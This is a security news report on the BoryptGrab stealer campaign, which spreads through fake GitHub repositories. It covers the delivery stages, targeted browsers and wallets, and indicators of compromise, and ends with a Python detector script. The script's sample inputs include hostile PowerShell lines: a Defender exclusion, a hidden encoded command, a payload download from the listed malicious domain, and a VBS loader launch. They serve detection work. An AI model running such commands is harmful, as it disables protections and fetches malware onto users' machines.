Researchers have discovered a new malware campaign that propagates the BoryptGrab stealer through phony GitHub repositories. By posing as game cheats, productivity tools, media software, and utility apps, the operation exploits people's trust in GitHub and in free software downloads.

When victims search for these tools, they are directed to public repositories that look authentic but use staged download pages and ZIP archives to spread malware. The campaign appears to be active and wide-ranging: investigators found more than 100 public GitHub repositories connected to the operation, some dating back to 2025. Many used search-engine-friendly keywords to rank highly in search results, which helped the phony projects look like authentic software.

Additionally, comments and code patterns in Russian were found on some repository pages, pointing to a potential Russian-speaking threat actor.

Delivery in Multiple Stages Using Fake Tools

The attack starts when a user downloads a ZIP file that looks like a useful program. In some cases the executable in the archive launches a hidden payload via DLL sideloading. In others, the archive contains a VBS downloader that retrieves malware from a remote server using obfuscated PowerShell commands.

Some variants also try to lower the likelihood of detection by adding Microsoft Defender exclusions. The malware chain then branches: while some launchers retrieve BoryptGrab, others may retrieve a PyInstaller backdoor called TunnesshClient, a Golang downloader called HeaconLoad, or a Vidar stealer variant.

[Figure: BoryptGrab campaign attack chain (Source: trendmicro)]

By using TunnesshClient to establish a reverse SSH tunnel, the attacker can relay traffic, execute commands, search files, upload content, and even turn the compromised system into a SOCKS5 proxy.

[Figure: The malicious Voicemod Pro GitHub repository's README page (Source: trendmicro)]

The layered design makes the campaign flexible: different victims may receive different payloads, and the use of scheduled tasks, registry persistence, and encrypted downloads complicates investigation.

Web browsers and cryptocurrency wallets are the main targets of theft. The BoryptGrab stealer, written in C/C++, was built to harvest a wide range of data. It targets major browsers including Chrome, Edge, Brave, Opera, Firefox, Vivaldi, Chromium, and Yandex, and can retrieve browser data, saved passwords, and other user data.

It also makes use of publicly available code for the Chrome App-Bound Encryption bypass, demonstrating how attackers repurpose open-source projects for malicious ends. According to Trend Micro research, the malware also targets cryptocurrency wallets, including desktop applications and browser extensions.

[Figure: The ".github" repository contains code for the phony download tool (Source: trendmicro)]

Exodus, Electrum, Ledger, Trezor, Atomic, Binance, Wasabi, Bitcoin Core, Ethereum, and numerous other wallets are among those that are targeted. BoryptGrab can also take screenshots, gather data from Telegram and Discord, collect system information, and search shared folders for important files.

Type        Indicator           Context
Domain      botshield[.]vu      Malicious payload host
Domain      best-tinted[.]com   Fake GitHub download page
IP Address  193.143.1[.]104     Attacker server for TunnesshClient
IP Address  45.93.20[.]195      Local SSH forwarding server

The malware gathers the stolen data, compresses it, and uploads it to infrastructure under the attacker's control. The campaign demonstrates how threat actors combine wallet theft, modular loaders, phony GitHub projects, and SEO abuse into a scalable operation aimed at both everyday users and cryptocurrency holders.
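As an added example (not from the article or from Trend Micro's research), the following Python scans PowerShell script-block text for the loader behaviours described above (Defender exclusion additions, encoded PowerShell, VBS downloaders) and for the defanged indicators in the table, refanged for matching. The sample script blocks are constructed, and the pattern names, regexes and function names are assumptions of this example.

```python
import re

# Indicators quoted from the article's IoC table, kept in their defanged form.
DEFANGED_IOCS = {
    "botshield[.]vu": "malicious payload host",
    "best-tinted[.]com": "fake GitHub download page",
    "193.143.1[.]104": "attacker server for TunnesshClient",
    "45.93.20[.]195": "local SSH forwarding server",
}

# Behaviours the article attributes to the loaders, as regexes over script-block text
# (pattern names and regexes are assumptions, not Trend Micro's detection logic).
BEHAVIOUR_PATTERNS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I),
    "encoded_powershell": re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "vbs_downloader": re.compile(r"\b(?:wscript|cscript)(?:\.exe)?\b.*\.vbs\b", re.I),
}

def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 'example[.]com' back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def scan_script_block(text: str) -> list:
    """Return one finding per behaviour pattern or refanged indicator seen in a block."""
    findings = []
    for name, pattern in BEHAVIOUR_PATTERNS.items():
        if pattern.search(text):
            findings.append({"type": "behaviour", "name": name})
    lowered = text.lower()
    for defanged, context in DEFANGED_IOCS.items():
        if refang(defanged).lower() in lowered:
            findings.append({"type": "ioc", "name": defanged, "context": context})
    return findings

def triage(blocks) -> dict:
    """Map block index -> findings, keeping only blocks with at least one hit."""
    results = {}
    for i, block in enumerate(blocks):
        hits = scan_script_block(block)
        if hits:
            results[i] = hits
    return results

# Constructed sample script blocks in the style of PowerShell Event ID 4104; not real captures.
SAMPLE_SCRIPT_BLOCKS = [
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\Updater"',
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAuAC4ALgA=",
    "Invoke-WebRequest -Uri http://botshield.vu/payload.bin -OutFile $env:TEMP\\p.bin",
    "wscript.exe //B $env:TEMP\\loader.vbs",
    "Get-ChildItem C:\\Users\\Public\\Documents",
]
```

Running `triage(SAMPLE_SCRIPT_BLOCKS)` flags the first four blocks and leaves the benign directory listing alone; in practice the input would be script-block text pulled from the PowerShell operational log.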